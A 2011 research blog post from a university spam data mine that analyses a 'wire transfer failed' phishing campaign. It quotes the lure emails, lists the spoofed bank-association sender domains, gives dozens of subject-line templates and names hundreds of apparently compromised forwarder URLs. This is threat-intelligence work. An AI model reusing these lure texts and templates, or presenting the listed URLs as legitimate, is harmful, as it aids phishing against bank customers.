Posts by author:

UAB's Director of Research in Computer Forensics

ACH / WireTransfer Failed spam goes crazy!

by UAB's Director of Research in Computer Forensics on November 16, 2011

in SBN

Yesterday we saw two HUGE spam campaigns that continue into this morning advertising various alternatives of "your wire transfer failed" as subject lines.

We saw at least 86,197 copies of this spam on November 15th, that I am mentally dividing into "Named Institution / zfin" spam and "random intermediary" spam.

The "zfin" spam was far more prevalent, with 62,331 copies of the 86,197 copies pointing to a URL that contained "zfin.php" in the path.

The "zfin" spam has a mail message that reads something like this:

Dear Account Holder,

Money Transfer sent by you or on your behalf was hold by our bank.

Transaction ID: 17019302204565051
Current status of transaction: on hold

Please review transaction details as soon as possible.

N. B. Abel
Treasury Management


The "non-zfin" email has a message that reads something like this:

Dear Bank Account Operator,
I regret to inform you that Wire transfer initiated by you or on your behalf was hold by us.

Transaction: 238006864683285
Current transaction status: Pending

Please review transaction details as soon as possible.


In both versions a very large number of "intermediary" spam domains are used. These are "page forwarders" that have been placed on compromised web servers. The hackers have gathered a very large list of website userids and passwords where they can place new content at will, without the knowledge of the webmaster. They log in as the webmaster, upload their "forwarder" page, and then use that newly created page as the destination in spam messages.

More than 15% of the spam that we saw at the UAB Spam Data Mine yesterday belonged to this pair of campaigns, and the volume is still extremely high this morning.

Many of the emails used the faked "from" domains:

uba.org 5785
lba.org 5762
aba.com 5724
bankersonline.com 5681
cbanet.org 5674
vabankers.org 5672
mbaa.org 5645
nationalbankers.org 5634
icba.org 5620
allbankers.org 5604
fiba.net 5532
direct.nacha.org 5024


Forty-seven destinations were listed by the "zfin" spam, where a Financial Institution was included in the subject line. These destinations heavily favored Argentinian domain names:

adsr.com.ar /zfin.php
alarpargentina.com.ar /zfin.php
amhbra.com.ar /zfin.php
berlinonbike.de /zfin.php
blbtranslations.com.ar /zfin.php
cargadedatos.com.ar /zfin.php
cienciarama.com /zfin.php
diagonalpro.com.ar /zfin.php
diloplas.com.ar /zfin.php
f-guazzaroni.com.ar /zfin.php
grupoaie.com /zfin.php
healthsolution.com.ar /zfin.php
hebamme-hindenberg.de /zfin.php
horsejack.com.ar /zfin.php
horuz.com.ar /zfin.php
iguazuwonderful.com /zfin.php
imevial.cl /zfin.php
juliancortary.com /zfin.php
mecanicamm.zzl.org /zfin.php
mikromesh.de /zfin.php
mileycyrusdaily.com /zfin.php
monialberti.com.ar /zfin.php
ohoven.de /zfin.php
onpacker.de /zfin.html
picturereport.net /zfin.php
playamarinaestates.com /zfin.php
regionalvanesaduran.com.ar /zfin.php
saboresdecordoba.com /zfin.php
safarisfotograficos.com.ar /zfin.php
schoss-objekt.de /zfin.php
sindy.com.ar /zfin.php
sindy-arg.com.ar /zfin.php
tamandua-transporte.com.ar /zfin.php
vanessahudgens.bz /zfin.php
video-professionell.de /zfin.php
visiondelnoroeste.com.ar /zfin.php
viveroelparaiso.com.ar /zfin.php
whitehorsemedia.de /zfin.php
www.ava-kunden.de /zfin.php
www.bx000471.ferozo.com /zfin.php
www.enpuntasdepie.com.ar /zfin.php
www.profileinformatica.com.ar /zfin.php
www.samavi.com.ar /zfin.php
www.seebek.com.ar /zfin.php
www.tecnosistemas.com.ar /zfin.php
www.tecnotrucos.com.ar /zfin.php
www.tetraisotopos.com /zfin.php

By mixing a "prefix" with an "institution name" more than 10,000 unique subject lines were created. 702 Financial Institutions have been named so far . . .

The prefix for the subject is selected from this list:

ACH debit transfer was hold by
ACH debit transfer was not accepted by
ACH payroll payment was hold by
ACH payroll payment was not accepted by
ACH Transfer was hold by
ACH Transfer was not accepted by
Bill Payment was hold by
Bill Payment was not accepted by
Domestic Wire Transfer was hold by
Domestic Wire Transfer was not accepted by
Funds transfer was hold by
Funds transfer was not accepted by
Money Transfer was hold by
Money Transfer was not accepted by
Payment was hold by
Payment was not accepted by
Wire Transfer was hold by
Wire Transfer was not accepted by

and then suffixed with a financial institution name from the list found at the end of this email. . . .

The "non-zfin" form of the list uses one of these subjects: (Random number use is notated by #RND#)

ACH payment canceled
ACH payment rejected
ACH transaction canceled
ACH Transfer canceled
ACH transfer rejected
ACH transfer was hold by our bank
Declined Direct Deposit payment
Direct Deposit payment ID #RND# rejected
Direct Deposit payment was cancelled
Direct Deposit payment was declined
Direct Deposit payment was rejected
Disallowed Direct Deposit payment
Fwd: Wire Transfer (#RND#)
Fwd: Wire Transfer Confirmation
Fwd: Wire Transfer Confirmation (FED #RND#)
Fwd: Your Wire Transfer
Notification about the rejected Direct Deposit payment
Payment ID #RND# rejected
Re: your Direct Deposit payment ID #RND#
Regarding your Direct Deposit via ACH
Rejected ACH payment
Rejected ACH transaction
Rejected ACH transfer
Urgent notice about your electronic payments
Your ACH transaction
Your ACH transfer
Your Direct Deposit payment ID #RND# was declined
Your Direct Deposit payment via ACH was declined
Your Direct Deposit payments were disallowed
Your Direct Deposit payments were rejected

These spam messages directed users to one of 1962 unique URLs that all SEEM to be compromised websites, with the exception of some "free hosting" sites, and a handful of URL shortening services. That list is presented below, with the list reduced to 671 instances by eliminating all but a single example URL per host computer:

015cc13.netsolhost.com /7o1otl/index.html
119.245.150.188 /
163.30.58.134 /
164.125.9.9 /~kimjw/gigl.php
173.193.15.56 /~assalamt/13xwph/index.html
193.59.73.242 /
194.51.85.73 /~tlariviere/zmtg.html
195.244.192.61 /
200.13.224.125 /
200.58.114.11 /
202.43.73.66 /
203.174.34.130 /
210.239.8.82 /~kenmin/akatx.php
212.110.96.163 /
213.191.128.17 /
216.172.186.5 /~peacock/9f46fnr/index.html
38.103.167.38 /
4a.4b.354a.static.theplanet.com /~playcas/5be1urt/index.html
60.251.4.82 /
62.193.216.26 /
62.233.121.21 /
62.233.121.25 /
66.133.129.5 /~nsmarc1166/gbsmofb.html
74.86.158.236 /
82.140.32.161 /
82.223.150.99 /
83.243.20.173 /
84.32.77.200 /
87.98.187.244 /
90plan.ovh.net /~aventureo/1k87cy0/index.html
a.md /9Q6
abandonedontario.ca /
abbastravel.com /
ad.f8.5546.static.theplanet.com /~outdoors/0nnpob/index.html
adagadoxig.freecities.com /acjxur.html
adamant.az /deuhgi.html
adanovan968.100megsfree5.com /oduarg705.html
adi-tobyfatud.fcpages.com /oprirtir.html
ady-ufodopyrub.envy.nu /bezuvee0.html
afucezox706.bigheadhosting.net /nofloudabuse.html
agrooyl.ro /inlcude.html
airteksystems.com /
airworkscompressors.com /
ajubecujal-tope.freewebsitehosting.com /lrosperousneslaa08.html
akapela.gr /7as4xe/index.html
akat-tech.com /
alahpe.notlong.com /
alasimipi-akad.maddsites.com /poadkh.html
ale-jygowesop.lookseekpages.com /leonijii785.html
aleksrdest.com /
alfra-tools.be /contents/index11.html
alfra-tools.nl /
alided-isig.freewebportal.com /noninfecluoufyy45.html
all-expo.eu /0uktna/index.html
alphametal.info /
alphashop.nl /
alugiceb34.lookseekpages.com /pptopwaner.html
alzmetall.be /shared_files/index11.html
alzmetall.nl /contents/index11.html
amanibap105.envy.nu /pdiasamd.html
amidopysud.greatnow.com /pytacinc.html
amolijuza795.freewaywebhost.com /novdurabbebii57.html
amylo.ca /
annelotte.com /
anu-efitodose.maddsites.com /pinuda.html
anwaltskanzlei-apw.de /dxocq8/index.html
apibopeco-isex.maddsites.com /pammtqqaw.html
apnea-creativa.net /
apollox.net /
aqas-rijaxatoc.virtue.nu /polivlex.html
aqo-awiwyzyhot.lookseekpages.com /phaxa12.html
aquastats.nl /
ariane-services.com /~ph_laura/1trr7oh/index.html
asewad722.freewebsitehosting.com /petrqeisec.html
askara.ca /
assilphone.com /46in4f/index.html
assistantarea.com /0dt038i/index.html
astola.com.au /03ajwnt/index.html
athmajothi.com /2kejqlu/index.html
atlas.nseasy.com /~athmajot/995rxv/index.html
atomicdigitalcapture.com /4srpft/index.html
atscaf.fr /0w019w/index.html
audier.nl /1vz1hs/index.html
aunesty.com /34n6z2t/index.html
aurorabraces.com /
autodc.fr /5s82w4/index.html
auvalon.sk /0wffuo/index.html
aviorr.com /0jlklp6/index.html
axux-oxylule.s-enterprize.com /nikeuu5.html
aze-seqyqan.dreamstation.com /rorihigotikano.html
aziatische-ingredienten.nl /52n8pw/index.html
azuma.co.th /
babytake.com /7r7hr4p/index.html
badcompanyeredar.ba.ohost.de /2m23xd6/index.html
balconesdelparque.com /3sdl39/index.html
baldimanuela.it /inlcude.html
bandzaagmachine.nl /
banyanchildrenlibrary.com /qbbxnth/index.html
barpetra.com /hsldl6/index.html
bb4f.net /0pwbvz/index.html
bedrijftekooptiel.nl /
bedrijftekoopzetten.nl /
benice.pytalhost.de /8ir8he9/index.html
berufskolleg-brilon.de /2jt3oy/index.html
beststockbook.com /21jrj7g/index.html
bidenurefu-upi.servetown.com /nixqczzn.html
bifapuniho-nyna.digitalzones.com /jypajpa.html
birchip.com /c2xollw/index.html
biru.web.id /nemi5k/index.html
bi-vent.de /51kk7o/index.html
bizalgerie.com /92usm9/index.html
bjay12.com /2pamuex/index.html
blog.forumfan.pl /
blog.tedinet.com /kissnza/index.html
boatbooks.ca /
boatlicences.com.au /msp9nc/index.html
boncukhaliyikama.com /echhgst/index.html
boroth.servers.rbl-mer.misp.co.uk /~attract/3vpite/index.html
bosokovemi1800.maddsites.com /wizim.html
bosugixe.sdhost.tk /ugisogu.html
brouze.fr /inlcude.html
brutalfun.net /0p4tl4/index.html
bumblebeeman.enixns.com /~bookmi/726d5mn/index.html
buwynobolo.freehostyou.com /wlrbo.html
buzeqok.222mb.tk /aruvivy.html
byqopoveni-apyl.fcpages.com /redberunnez290.html
c2.16.344a.static.theplanet.com /~peterfur/hqrgv4/index.html
caddcentre.org /1do876d/index.html
caddcentre.ws /4yeqtja/index.html
cadokeduzi207.100freemb.com /paxhokuh.html
cafeamerika.de /2n7a13/index.html
cahev.com /
caqiwy-mora.greatnow.com /pgonham.html
casinospoker-online.info /3z0ugvx/index.html
casu-urenywyje.lookseekpages.com /sasg0211.html
cazonof1845.greatnow.com /nisolicoo8933.html
celluloidtamil.com /inlcude.html
cgworkshops.net /inlcude.html
ChaitanyaHolidays.in /
champagne-ruelle-pertois.com /
chateau-haut-gachin.com /
chilp.it /496e27
ciata.be /
cihawuva.webclot.org /yruwevu.html
cim-byzowofy.freewaywebhost.com /polairs.html
citydibo1446.exactpages.com /protenluuu41.html
citynewsservice.de /g5nfpqn/index.html
cizomixo.freehosting.bg /uxicutov.html
classicknits.co.in /6j3o6e/index.html
click1.goshadowshopping.com /iyyvyncqkbpwvhkcwbmpkwtnthwhmyhthfmyfkmynymzmc_lkhdmzdwhjzw.html
clickandclaimcouk.site.securepod.com /5n4uxw/index.html
cm.digiportal.com /php/CR/cmregister.php%3Fdata=cR2NA4mi3ED%2B9KZ3KbHZoLUlSJRqo2hCZWTTw7FA86yfesTTa7T5mz8nIfQIsOEJqCYEjlrSL2Kb22pt1bCNT9YgXTqnV9Hq0szMhVjmIj7KYTbpAXf8d9rdvs9EUK7IwIuiNhR4mho%3D
cocynuvoxo.virtue.nu /pabter255.html
cojojibi.4sql.net /amematy.html
conred.com /65q7jj/index.html
contimac.eu /
copofude.freehost.artonat.com /ugisogux.html
cornwell.cz /f.html
cos-ovaxyrex.mindnmagick.com /pashtetdqivuz.html
cp05.digitalpacific.com.au /~austraqc/6g6dif/index.html
crm.ndr.it /
cukydyvu.exactpages.com /uu3920.html
cuzihyket1405.bigheadhosting.net /dosf882.html
cygnus.inc.cl /~planhost/jgf5m7/index.html
cyta-qorizatovy.greatnow.com /onarban303.html
czester.freehost.pl /
dab-gynyto.1accesshost.com /ofyt745.html
dachshund.ru /
dahlih.nl /
dashramspa.com /79q2h6/index.html
daxilymapo-ymeg.exactpages.com /atextn858.html
degogoyi.hosto2.info /ruvivyfu.html
deko-bett.de /04eozwl/index.html
dembs.com /
denohifi.builtfree.org /xqibitaa90.html
desmidspijk.nl /inlcude.html
dhseminars.com /5zn712w/index.html
dialog-translations.com /00kzr4/index.html
diamanza.50webs.com /
dirimukysu.1accesshost.com /polarbead7610.html
disasterrecovery.org /
djxcube.com /
dollysgroceries.com /
domuxurasu.envy.nu /pyia234.html
dos-ykyratih.fcpages.com /lromisemyngerii62.html
douglasgwynnsmith.com /
dubimajis1142.bigheadhosting.net /noncallapsabmeyy05.html
durl.me /mikas
dykutimopa.servetown.com /nanablelutionuu14.html
edenindustries.ca /
egifat-kysi.maddsites.com /wlsejenro.html
ehykigicos1194.freehostyou.com /plogmafter111.html
eishohwa.notlong.com /
eja-upigewary.fcpages.com /nokh529.html
ekuin.notlong.com /
ekuxylylak-zowo.100freemb.com /osazatu.html
em003.czechian.net /
enafej1554.digitalzones.com /jity890.html
enfantsdoprata.org /
enyqypuhys.lookseekpages.com /pvopyliticii404.html
eqywazogif-uno.lookseekpages.com /paniauu96.html
eterysam.1accesshost.com /deipmus.html
europa-haus-leipzig.de /7k75p9/index.html
evil-knievel.gmxhome.de /
evy-evaqahup.freewebsitehosting.com /odbug.html
ewamosy1959.freewaywebhost.com /mttygesyy87.html
ewivisabec-jig.envy.nu /opium206.html
ewoutjonker.nl /
exirevoka.builtfree.org /kfhyra.html
eyeicu.notlong.com /
ezexezeba703.100megsfree5.com /sawv636.html
ezomusic.ez.funpic.de /
ezuwaqi-zoqa.1accesshost.com /wereipacd.html
fej-anepyveruw.fcpages.com /paradyseii170.html
f-guazzaroni.com.ar /
finsko.hostuju.cz /
fiwawax.10gb.tk /uhezivog.html
france-azur.nl /
fullmex.iblogger.org /inlcude.html
fyparor1321.freecities.com /rushantassdanov.html
galaxy.host-care.com /~perthbe1/fmkvw3/index.html
gia-jp.net /
gibobe1829.freewebportal.com /mutmitchell.html
gihujakabu.greatnow.com /promutzeis.html
giloziz-ijub.envy.nu /rorf.html
gofipipy-syg.100freemb.com /olofjolindur.html
goksenmuhendislik.com /
gozaqoba.eg.vg /nezivogo.html
gtpikes.com /6cqmid/index.html
gud-exonad.lookseekpages.com /nizibc.html
gulohr.notlong.com /
guptaservices.com /
guwe-syginyn.100megsfree5.com /fapux250.html
gyk-yrubecata.digitalzones.com /gacezoo7.html
halliemgt.com /59ybsd/index.html
hamibukike-qan.builtfree.org /sonyxplosivoee56.html
hammerrassebande.de /8jz5glg/index.html
harmonie-travaux.com /1lvsq8k/index.html
hax1234.ha.funpic.de /
hepidyzozo.1accesshost.com /ppoisee90.html
hero.host-care.com /~pin/9es7srf/index.html
hetigy-kyju.builtfree.org /urangahoua.html
himalayanweavers.org /
hipuhaq.simik.net /nezivog.html
hiralix.mblogger.info /vozalah.html
hiranobag.co.jp /
hitcombo.com /inlcude.html
hitechcsi.com /
hiz-ysupyso.100megsfree5.com /pbiccehc.html
hockeydykeincanada.ca /images/main.html
hoepner-lacke.de /89fj0g/index.html
hoguzud.blogerpa.com /nezivog.html
hokifuxu.greatnow.com /outsmature.html
homesatthebeach.ca /
honestlawyer.ca /
honkafusion.ch /o55zj1/index.html
honkafusion.es /bpmxh6/index.html
honkafusion.fr /1h0wgog/index.html
honmononoyosa.sakura.ne.jp /
hotelkayisi.com /inlcude.html
hsh-sh.de /04y855/index.html
icppo.ic.funpic.de /
icyryxure.digitalzones.com /paracletasiz.html
iduposywa.freewebsitehosting.com /pumilaoo62.html
iheartmypet.ca /
ihoje.notlong.com /
ijicuzajy-esu.arcadepages.com /ppkboris.html
ijy-ymexegahix.freewebsitehosting.com /nintwove.html
ikiwulete.mindnmagick.com /jordert1711.html
ikylec1342.o-f.com /bobico.html
ilidavy-pow.mindnmagick.com /zilku.html
ilipinyqez1193.fcpages.com /rickaa3447.html
inkwellgraphics.ca /
inteligus.pl /0xp8fz/index.html
interasia.co.in /
iphoneipadexperts.com /
ipigipo-ese.lookseekpages.com /nocregs.html
iqiturixug1179.lookseekpages.com /baljk891.html
iqodew493.o-f.com /bonsaa93.html
iqopuc-himi.100freemb.com /nurlajidealmarky.html
iru-ynonywecid.mindnmagick.com /rutipog.html
is.gd /2vNBBj
i-sites.hu /inlcude.html
ivywej69.s-enterprize.com /purtygmress.html
iwefedoj.dreamstation.com /viomondas.html
iwynokybar-ovu.virtue.nu /phantomnrue.html
ixoboqyqe-eme.greatnow.com /pajvar.html
jabowabi.zbyte.org /edoruvyh.html
japodubyj254.envy.nu /alexee94.html
japuseny.fcpages.com /paasoz.html
jaylau.com /
jel-acofuhagi.envy.nu /gapereno7210.html
jemadab1072.exactpages.com /owylfrudu.html
jeqy-qogiqyw.100megsfree5.com /qeeml.html
jimpruden.com /html/main11.html
jixucewa.arcadepages.com /hrovidableoo414.html
joakimdo.com /main11.html
johannessendesign.com /
john-adams.ca /main11.html
johnspassmonsterkingfish.com /
jozacupub.mindnmagick.com /proliderousnyaa88.html
ju-kreis-olpe.de /13z229/index.html
jup-oqupiwyf.lookseekpages.com /rickeskenmop.html
jydinoxoto.dreamstation.com /phit47tiz37.html
kakexo-xyho.builtfree.org /packran866.html
kamiqudob.lookseekpages.com /memgaful8510.html
karlo-b.de /1wls5te/index.html
kierwinski.pl /
kinditech.org /
kisyholy971.arcadepages.com /vsynu.html
kizodyxy.1accesshost.com /pesrul7910.html
klu-inkleur.nl /
kociqaw.websitehostfree.com /nezivog.html
kon.wheel.sk /4ypcij5/index.html
kowalczyk.cz /
ks31295.kimsufi.com /~palmthre/3dg825m/index.html
ks355256.kimsufi.com /~pool/bdw27yh/index.html
kuczka.eu /j9xiw3/index.html
kukawow.heikalhost.tk /ugisogu.html
kumquatphoto.com /
kutrite.ca /
laboiteabonheur.fr /
langleykinsmen.ca /
latiwusa.freewebportal.com /mipailmironuxko.html
latunogu.blogstar.tk /ovyruwev.html
lavegliacarlone.it /inlcude.html
lexisutherland.com /4fbf35l/index.html
lezisah.notlong.com /
lieuwedevries.com /
lifeart-petra-eischeid.de /7pm4la2/index.html
liveinconcerto.nl /08e4wt2/index.html
LNK.by /ff843
locker-ba.com.br /site/inlcude.html
loru-lazetes.o-f.com /ovtorko.html
lozamita.freewebportal.com /pallelundttjoeg.html
lusepewe.sertdisk.net /ugisogu.html
lutesylo421.100megsfree5.com /mfyainyy7.html
luyized.metrohosting.info /erygegy.html
lywobaneb-omic.1accesshost.com /oo90rufat.html
lyxnia.gr /2khjpzg/index.html
macservice.vn /
maddogphotography.ca /images/main11.html
majs.ca /
mcars.pl /
mesinuangku.net /2krnil/index.html
migre.me /69SRA
miron.notlong.com /
mixland.ca /
mkmdevcenter.ca /
mohidumo.sooot.cn /ubijemat.html
molihove.goearni.info /gizazago.html
moq-ydygafyko.greatnow.com /povuuk.html
moruyime.pi6.info /nezivog.html
muguhesi.3host.tk /furuser.html
mysejofov1845.fcpages.com /selegaaa0808.html
myuu.de /
n2testing.co.uk /
naf-tufamur.dreamstation.com /vherzodjor8810.html
nailandhammer.net /
nakayimahotel.com /
nefelefi1879.fcpages.com /niskish.html
netdekorasyoninsaat.com /
ntlauf.nt.ohost.de /inlcude.html
nyjicited.freewebportal.com /nurdete.html
nylaneri-mac.servetown.com /ditonii1167.html
nytezuva-pyh.100megsfree5.com /eqq6911.html
nz-wolfenhausen.de /kpqnpk/index.html
obehumekid.lookseekpages.com /ovenhrehv.html
ochrona-almar.neostrada.pl /inlcude.html
ocig-ujaforisoc.exactpages.com /podvouskiialezj.html
oficinasvirtualesimc.cl /5j4k0ke/index.html
oguce.notlong.com /
ohquudi.notlong.com /
okeg-gyhydyq.dreamstation.com /oo67ao.html
okywijejaf.maddsites.com /ssorpuonu1.html
one-egizad.fcpages.com /vavilugxa.html
onipuwavy-oge.dreamstation.com /pwuptro.html
ontariobuildingtrades.com /5vfe149/index.html
ooblu.com /
ooquoobe.notlong.com /
opezopan.100freemb.com /pvodateconnection.html
opibak-baw.freewebportal.com /mobodultyy04.html
oqomijoh.virtue.nu /nyculmoaa0.html
oral-hekegudu.arcadepages.com /zrooo72000.html
ostwestfalen-lippe.de /8ffzcx1/index.html
otrasexshopmas.com /81p88fk/index.html
ourdogz.nl /04x6pt/index.html
oursdes4saisons.com /~oursdess/fjnopyy/index.html
outsourcemanpower.com /~outso4/4jz88e/index.html
outtheboxmusik.com /1vpj9l/index.html
ovarc.us /3df0ta/index.html
overnightclippingpath.com /a3g2pwc/index.html
ovijujase.exactpages.com /rmren.html
owehyrufiz.freewebportal.com /wubuyukiyndo.html
owips.square7.ch /pc6ypb1/index.html
oxodopi-cuce.maddsites.com /uurnorld15.html
oxu-yvurobuboh.freehostyou.com /topcaf881.html
oxymarketing.com.br /inlcude.html
oyuncumusun.com /2sfjyh2/index.html
ozcanymm.net /
ozinocug.o-f.com /njuf.html
p131879.webspaceconfig.de /d07a0hw/index.html
p7902.typo3server.info /9f9bp6n/index.html
paetzold-beratung.de /cvo8xq/index.html
PageDr.com /d1mqfg7/index.html
pagedrakemusic.com /1o1eis/index.html
paintball-bohinj.si /00vb7md/index.html
paiportacf.com /7t62aei/index.html
palathinkalktm.org /hogm7g/index.html
panmotorsports.com /53412dc/index.html
panteleon.de /6t73qt/index.html
panzercrom.com /1yd59f/index.html
paokvolos.gr /13abr4/index.html
paperequipment.com /1lt2bt/index.html
ParkGina.com /2xi5al/index.html
partnersarl.lu /a6c9j6d/index.html
pascal-bellefroid.be /627bqd6/index.html
paspartoy.gr /77j0m9/index.html
passgo.ca /
paszczak.pl /6vgjxor/index.html
paynterparmesan.com.au /0tnx3ta/index.html
pcapinvest.com /t373ygr/index.html
p-center.biz /169mdzp/index.html
pchelpch.pc.ohost.de /1fdlwp/index.html
pcmswitch.co.uk /1so14g/index.html
pc-tuning.be /5mgsw8z/index.html
pcwbc.ca /
pdc.bplaced.net /5c9tin/index.html
pdrg.zxq.net /5rte95/index.html
pdsignatures.com /o1l5a4/index.html
peachesandcreamspas.com /
peelcruise.com /3xw40nk/index.html
peluangusahaonlines.com /57tt9o/index.html
penisenlargementcourse.com /bb8yhu/index.html
perfilthermik.com /lkpeam/index.html
perso.ovh.net /~polyverr/74r128/index.html
personalinjuryaccidents.com /dogsyd/index.html
peruvision.de /95nivmn/index.html
PeshawarJin.com /13d4tx/index.html
peveduto.com.br /
pheebaha.notlong.com /
philipdc.ph.funpic.de /cx52om/index.html
philippe-decotte.fr /~philippezm/i7nsv9i/index.html
philippinetyphoons.com /25jy8gd/index.html
phobiaman.co.uk /9af3v8/index.html
ph-online.net /37tyaxa/index.html
photosdumonde.info /
phprecdb.bplaced.net /7s4y1p/index.html
pictureahealthierworld.org /4e7h78z/index.html
piefaez.notlong.com /
pies.edu.pk /~piesedup/f0grdvr/index.html
pifadew.bdlike.com /buluvivy.html
pinskylickstein.com /h3fywd/index.html
pioneerweb.in /a9zkq8i/index.html
pite-olacelyb.100freemb.com /gvizdikvk.html
pixa-design.de /4xmbbut/index.html
pixe.mx /
pixelyn.co.za /~pbxnet/0p9gu8/index.html
pkphotography.com /93b6jfu/index.html
plasticimages.com /504mcxt/index.html
playgroupstudio.com /4ycljge/index.html
playweb.6po.pl /
plexuscomms.com.au /chu594/index.html
plummessage.com /lt7joa/index.html
pmtm.com /78gr9so/index.html
poizonroze.com /1ujn1kg/index.html
Pokerworld.com.au /4mebwl2/index.html
polidor.eu /29e41h/index.html
polimitlc.altervista.org /119976/index.html
poliprodukt.pl /frjawen.html
popihug.indiv.in /ugisogu.html
poppenhouse.ru /2x1gsy/index.html
porezi.rs /
portonesautomaticos-ferrobone.cl /260je7o/index.html
portrait-skulpturen.de /6d138g6/index.html
prismproductions.net /0edicf/index.html
prodomoelec.com /
pronutrition.ca /
prosolv.se /
puqupity-sase.bigheadhosting.net /lapwevuu04.html
pushkardesigns.com /
putovuve.arcadepages.com /abee680.html
qarehuq.hosthost.info /ruvyhupa.html
qejazocuf-adus.dreamstation.com /nightshado257.html
qejuticu.pubwebhost.com /ygegysed.html
qezevosak.s-enterprize.com /dcbadur.html
qibuxumu-gen.freewebportal.com /ovehdiligenz.html
qim-tajomuhu.virtue.nu /xnryy596.html
qoge-wigiqiber.freewebportal.com /hhaj.html
qr.net /fqv2
queller-gemeinschaft.de /3rysoo/index.html
quze-fegabugage.freewebportal.com /qbohrint.html
qybo-hubybewu.freewebsitehosting.com /nonplatentiluu21.html
qyn-otomibezo.1accesshost.com /nobolybo13.html
qyxozoxija.dreamstation.com /ptym2111.html
racogad-upy.greatnow.com /plaloj.html
ramebeny1368.greatnow.com /prompncyyy42.html
rapidosports.com /
raum-wolfenhausen.de /39zvuv3/index.html
redir.ec /8aOr5
rekufel.3host4.info /wuvyhup.html
rerajo-qaz.digitalzones.com /onioo8.html
restaurantposthalterey.de /1gml2xu/index.html
rid-yzytawaj.1accesshost.com /bursopaff.html
riteyolu.0fees.net /lodugiz.html
safe.mn /3tJR
safer63and881.com /
saform.com.pl /
sahecafa.3net.tk /furuser.html
saracens-fhc.ca /
scrapbookersbliss.com /
seasonal56.ca /
semineedevis.ro /
sensalights.com /in11.html
senuyave.yk0.net /wuvyhupa.html
sezaylighting.com /
sezogoca-epy.mindnmagick.com /restole.html
shangpalace.com.vn /
shorl.com /difratresutyby
siamrestaurant.ca /
simurl.com /bepnac
siperbinvestments.com /
smx1.hostdime.com.mx /~periodic/0hfmuib/index.html
snipr.com /2oalgv
snipurl.com /2oalwc
sojesif.hostingforfree.org /gagicyb.html
sorupemu.4ever20bucks.info /kejaruv.html
sothbys.ho.ua /
srisaipearls.com /
stepnik.de /9u4ougo/index.html
stykky.pl /
succesvol.su.funpic.org /
sudarom-dyke.dreamstation.com /qfoiio6g.html
surarena.rs /inlcude.html
sweetroute.com /
sytixytex140.s-enterprize.com /nicolahg.html
taklitci.com /
tamilsudartv.com /fejkb8e/index.html
tasaqifa.hostingwithu.com /uhezivo.html
tassilomusic.com /
taximihywe-pyri.bigheadhosting.net /kipusyy00.html
tbspirit.com /
tcjc.ca /
tcproperties.co.za /
teamprimerib.com /12evdr/index.html
tegikobi.w9l.in /edoruvy.html
telusplanet.net /~polihale/40ht0fa/index.html
teqaqybu.freewebportal.com /nermox.html
ternama.com /
tesuzuma-tah.freehostyou.com /zhavneree1971.html
thaore.notlong.com /
thegrandehaven.com /
thesacredvoicegallery.com /
thesurl.com /11
ticoyez.297m.com /gudylog.html
tie.ly /_ggeqie
tisilume.qualityprohost.com /sedejodu.html
tllg.net /aUm4
tm-studio.com.pl /
tolenaars.nl /
topolema.koon.pl /ivyfurus.html
toronto-orienteering.com /pictures/main.html
totavalaw-zejy.freewebportal.com /nunes.html
toyamakitokito.web.fc2.com /
trmfiltration.com /
trucksidefunding.ca /
tujeqexo.000adz.com /nezivogo.html
tuvoca1466.freewebportal.com /rdobyllo.html
u-china-consulting.com /1qvkcx5/index.html
uci-nyhiguve.fcpages.com /trobexso.html
ucugywyl.fcpages.com /brntschrmnf.html
ugi-ypuwewipax.freewebportal.com /otakunojoworo.html
uhocekef.servetown.com /heaami.html
ujugob-ytoz.100megsfree5.com /ivadpomidorivf.html
ulmer-shop.de /2rsl1a/index.html
ultraline.it /
umy-qekuqi.dreamstation.com /irnuschel.html
unbrockandice.ca /images/in11.html
unitedbookgroup.com /
upihigajar.1accesshost.com /pipkertyn.html
upmarketing.mx /
url.ie /dia9
usifof-ufy.o-f.com /prosencaphalecii21.html
usyrepihon-elaz.1accesshost.com /pronessorsii62.html
vabefod-uron.greatnow.com /ldnrkaa5.html
vahaxisasu.mindnmagick.com /vokolak.html
valanali.cuccfree.com /icutovov.html
vaneenoo.eu /images/index11.html
vbvastgoed.nl /
velvetropemiami.com /jl3o9c/index.html
vesadofefy.freewaywebhost.com /nuhedreampirls.html
vetmobile.ca /
video.web2001.cz /
viphoco.notlong.com /
vlamos-homerealty.gr /
voyibopa.cuscovirtual.tk /ivefuquw.html
vugojape.mindnmagick.com /nonspors.html
vuhyzeto1234.exactpages.com /wroromunticii71.html
walther-reinhardt.de /bvbiohh/index.html
wanaqecu.onlin-e.net /lodugiz.html
wca8532g2.homepage.t-online.de /d2gcop/index.html
webresourcecentral.com /2858sa/index.html
webseosmoservices.com /
welfare114.net /
welfens.de /8tc00m/index.html
wetyqifu1471.1accesshost.com /sluvataxo.html
whistleradio.com /
wiyetipa.webhostingforfree.org /ymanibu.html
wohi-xygumu.1accesshost.com /dystemhakem.html
wp.tedinet.com /bx0koa/index.html
wsconsulting.ca /
wuda-lolexu.maddsites.com /murokchiok.html
www.africanelections.org /4qtmbt/index.html
www.athmainfosolutions.com /29ial3/index.html
www.avtkhyber.com /1tcnzx/index.html
www.bakou.gr /h1hmsp/index.html
www.casainlegnohonka.it /wmi34d/index.html
www.desmidspijk.nl /
www.dldsrl.it /
www.flooringin.ae /
www.garagevanstraelen.be /
www.hadi-art.com /
www.honkafusion.it /t8xfifq/index.html
www.jenabakery.com /
www.lumhongye.com /13f2em/index.html
www.mesinuangku.net /~peluang4/sa0hxip/index.html
www.parimpood.ee /16e6beb/index.html
www.pcrutchfield.com /1g9wxxn/index.html
www.peluangusahaonlines.com /28dvhds/index.html
www.pension-kleinekorte-guestrow.de /
www.phobiaman.co.uk /81ccngg/index.html
www.photoeditingservices.co.uk /3sr31z5/index.html
www.physicaltherapy.co.ke /9a54nqy/index.html
www.pies.edu.pk /2nktlke/index.html
www.plasticsurgeryinstituteofcalifornia.com /aojaas/index.html
www.poodlesislandwear.com /eoqf7q/index.html
www.postandparcel.net /52xxjn/index.html
www.proalkoholici.cz /atb.html
www.publishingoutsourcing.com /2e0dh9/index.html
www.seriilanlar-antalya.com /
www.stockkamp.com /
www.wouda-assu.nl /
xagemume.bdlike.com /iticuto.html
xechuyendung.net /
xikuga486.1accesshost.com /anrrey216vorkuta.html
xizakobiv1963.freewebsitehosting.com /avevbroaren.html
xoragam.hostingperron.com /cacejodu.html
xumubowo.johaneswisnu.info /ejodugiz.html
ycomefy1524.bigheadhosting.net /aanbelochik.html
yeasheve.notlong.com /
